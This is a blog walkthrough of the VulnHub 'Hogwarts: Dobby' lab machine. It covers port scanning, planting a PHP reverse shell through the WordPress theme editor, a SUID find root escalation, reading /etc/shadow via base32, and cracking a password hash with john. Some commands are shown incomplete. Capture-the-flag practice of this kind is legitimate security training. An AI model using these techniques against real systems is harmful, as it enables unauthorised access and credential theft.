VulnHub: Hogwarts: Dobby

Today we will take a look at Vulnhub: Dobby. My goal in sharing this writeup is to show you the way if you are in trouble. Please try to understand each step and take notes.

  • Network scan

Command: sudo nmap -p- -sV -sC -oN nmap/open — open

Nmap scan report for
Host is up (0.095s latency).
Not shown: 58603 closed tcp ports (reset), 6931 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
80/tcp open http Apache httpd 2.4.46 ((Ubuntu))
|_http-title: Draco:dG9vIGVhc3kgbm8/IFBvdHRlcg==
|_http-server-header: Apache/2.4.46 (Ubuntu)
MAC Address: 3C:A0:67:C5:35:33 (Liteon Technology)
  • Web

If we look at the source code of the page, we encounter something like this.


Let’s decode with Base64

too easy no? Potte/alohomorar


But below is a hint.

/alohomoraDraco's password is his house ;)

I searched the internet for the name of the draco’s house.

  • Gobuster
/log                  (Status: 200) [Size: 45]


hint → /DiagonAlley

When we look at the articles here, we see that the author’s name is Draco.

  • Reverse shell

Let’s go to the admin panel.

Url: /wp-admin

Go to /wp-admin/theme-editor.php and select 404.php from twenty twenty.

Paste the php reverse shell.

After listening, go to this link


After logging in

Command: script /dev/null -c bash

Command: export TERM=xterm


Command: stty raw -echo ; fg

Command: reset

  • Root


Your machine

Command: python3 -m http.server 80

Target machine

Command: wget

Command: chmod +x

Command: ./

We found two gaps.

Vertical Privilege Escalation

Command: /usr/bin/find . -exec /bin/sh -p \; -quit

www-data@HogWarts:/tmp$ /usr/bin/find . -exec /bin/sh -p \; -quit
# whoami

Horizontal Privilege Escalation

Command: LFILE=/etc/shadow

Command: base32 “$LFILE” | base32 — decode

We copy the dobby line and paste it into the hash file on our machine

Command: john hash — wordlist=/usr/share/wordlists/rockyou.txt

Created directory: /home/al1z4deh/.john
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 128/128 AVX 2x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
ilikesocks (dobby)
1g 0:00:09:45 DONE (2022-05-22 14:38) 0.001706g/s 1107p/s 1107c/s 1107C/s iloveJESUS..iheartjake
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

Command: su dobby

Command: /usr/bin/find . -exec /bin/sh -p \; -quit

And now we are the root

“If you have any questions or comments, please do not hesitate to write. Have a good days”




Hello, my name is Elman. I am from Azerbaijan. I wish you a good days

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

How Picasso gets the Context without parameter passing

Build a Predictive Model for Twitter using AutoAI and IBM Cloud Functions

Docker Container Deployment using Ansible (Part-1)

CoinTiger Pool Adds TRDC

TDD in Angular — The Basics of General Testing

Understanding Decision Trees in Machine Learning

tree on a beach in front of blue water under a blue sky

Scrum for Weddings

Platform Development Update

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Al1z4deh:~# echo "Welcome"

Al1z4deh:~# echo "Welcome"

Hello, my name is Elman. I am from Azerbaijan. I wish you a good days

More from Medium

VulnHub: Funbox: Rookie

THM’s Alfred — Walkthrough

Hack the Box: Blue — Writeup (Without Metasploit)

Smag-Grotto CTF Walkthrough